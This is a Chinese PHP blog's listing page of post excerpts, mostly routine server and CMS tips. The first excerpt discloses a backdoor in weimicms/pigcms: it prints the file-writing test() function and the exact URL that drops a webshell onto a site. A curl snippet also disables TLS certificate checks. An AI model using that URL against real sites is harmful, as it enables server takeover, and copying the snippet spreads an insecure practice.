浏览模式: 普通 | 列表
分类: PHP | < | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | > | >>

网曝微信第三方平台出现惊人后门及漏洞 微米 weimicms pigcms 等

[ 2017-10-21 10:09:32 | 作者: admin ]
来源:http://blog.360dseo.com/

网曝微信第三方平台出现惊人后门及漏洞,后门及漏洞轻则导致网站无法访问,内容被篡改,严重的可能盗取服务器资料。

更严重的可能会获取服务器直接管理权限,因为代码属于正常参数提交,所以不会被杀毒软件及各种防火墙拦截,完全免疫!!!
后门1:
WeixinAction.class.php
public function test($name, $data)
         {
                file_put_contents($name, $data);
         }
这句话的意思就是在根目录生成文件data可以一句话木马提交注入。
执行原理网址后加index.php?g=Home&m=Weixin&a=test&name=muma.php&data=木马内容,
直接打开浏览就可以。笨蛋的说就是粘贴进网址按回车。
这里就是提交一句话木马写入到根目录muma.php内 由于很多程序做了转码,但是还是很多可以执行的。
...

阅读全文…
分类: PHP | 永久链接 | 评论: 0 | 引用: 0 | 浏览: 1941

一次curl无法获取https网页的问题解决

[ 2017-09-25 17:23:49 | 作者: admin ]
centos6.5的服务器,curl是7.1
php5.3下面死活就是获取不到https内容,只有一片空白,但是抓http网页正常。

phpinfo()下面的信息正常,有curl和openssl,理论看是肯定能支持https的。然后在centos终端下curl能获取https,
这里想可能是php兼容问题,想着要不要升级php,随意把php-fpm重启了下,居然就好了,晕!!


后来想到curl可能版本升级过,造成php-fpm需要重启下才能识别?反正重启大法搞定了
function get_http($url){
    $ch = curl_init();
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); //不验证证书
    curl_setopt($ch,
...

阅读全文…
分类: PHP | 永久链接 | 评论: 0 | 引用: 0 | 浏览: 1120

转:PHP5.3后在本机运行很慢的解决方法

[ 2017-08-03 22:28:32 | 作者: admin ]
方法一:这是因为PHP 5.3在面对数据库配置信息中的“localhost”会犹豫,因此直接把这个地址改名为“127.0.0.1”,这个IP是IPv4下面的本地网络地址,实际作用和“localhost”一样,不过能明确告诉PHP这是IPv4网络。至于具体的修改流程,好比我的网站源程序是dedecms,因此数据库配置信息在html/data/common.inc文件中,要用Dreamweaver之类的专业软件编辑修改,否则保存后可能出错。

  至于别的程序,同样修改数据库配置文件即可,下面是一般的数据库配置文件信息。

  < ?php

  //数据库连接信息

  $cfg_dbhost = 'localhost';修改此处的localhost为127.0.0.1

  $cfg_dbname = 'fewfwefsdf';

  $cfg_dbuser = 'fsdfsdf';
...

阅读全文…
分类: PHP | 永久链接 | 评论: 0 | 引用: 0 | 浏览: 1083

xcache的安装php5.2.17

[ 2017-06-23 11:20:47 | 作者: admin ]
为了适应isapi,只能选择php5.2.17版本,不同版本不能兼容

xcache 下载地址 http://xcache.lighttpd.net/pub/Releases/3.2.0/
php5.2.17需要选择ts版
分类: PHP | 永久链接 | 评论: 0 | 引用: 0 | 浏览: 1022

php自动获取字符串编码函数mb_detect_encoding

[ 2017-06-03 14:19:16 | 作者: admin ]
当在php中使用mb_detect_encoding函数进行编码识别时,很多人都碰到过识别编码有误的问题,例如对与GB2312和UTF- 8,或者UTF-8和GBK(这里主要是对于cp936的判断),网上说是由于字符短是,mb_detect_encoding会出现误判。
例如:
$encode = mb_detect_encoding($keytitle, array("ASCII","GB2312′,'UTF-8′,"GBK",'BIG5′));
if ($encode == “UTF-8″){
$keytitle = iconv("UTF-8″,"GB2312//IGNORE",$keytitle);
}
分类: PHP | 永久链接 | 评论: 0 | 引用: 0 | 浏览: 1265

微信分享出现签名问题 invalid signature

[ 2017-05-28 14:08:32 | 作者: admin ]
p.s.首先目前分享的域名都需要加入微信的js安全域名

一般出现签名问题都是当前微信客户端获取的网址和进行签名的网址不一致引起的。

解决办法

1:在js中获取当前网址,然后js中ajax签名

2:程序中拼接网址,有些伪静态网页程序无法获取当前伪静态网址,只能进行伪静态拼接步骤。对照微信里面获取的地址进行生成
分类: PHP | 永久链接 | 评论: 0 | 引用: 0 | 浏览: 1118

discuz站点重新使用开启之后,遇到的QQ互联不能开启的问题

[ 2017-05-19 23:03:55 | 作者: admin ]
在应用里面一直就无法开启QQ互联插件,提示“系统繁忙”

网上找到一个方法,后台登陆后进入云管理界面
/admin.php?action=cloud&operation=open

然后在里面关闭QQ互联,然后重新开启,发现应用里面的QQ互联也开启了。
分类: PHP | 永久链接 | 评论: 0 | 引用: 0 | 浏览: 1116

完美解决电脑访问discuz手机版【支持触屏版】

[ 2017-05-19 11:23:02 | 作者: admin ]
前两天一直尝试着用pc(电脑)访问discuz手机触屏版进行调试,网络上相应的教程基本找不到,解决标准手机版的方法倒是可以在discuz官网找到,今天有点时间就整理一下,分享出来,希望可以帮助到大家!
               
              我们用电脑的浏览器浏览手机版网站,正常都会跳转到电脑版的,这个问题很好解决,现在很多浏览器都有切换UA(user-agent)的功能,程序判断是否手机就看这个UA。

              在这里我使用的是谷歌浏览器(chrome浏览器),先打开浏览器的【扩展程序】点击【获取更多扩展程序】然后在里面搜索【User-Agent】结果有很多,找到【User-Agent Switcher 2.0】安装一下,就ok了。【教程很简单,大家看了就会了,所以就不上图了】

              现在看看谷歌浏览器的右上角多了一个面具的按钮,点击一下会弹出很多的选项,可以根据自己的需要选择...

阅读全文…
分类: PHP | 永久链接 | 评论: 0 | 引用: 0 | 浏览: 1473
< | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | > | >>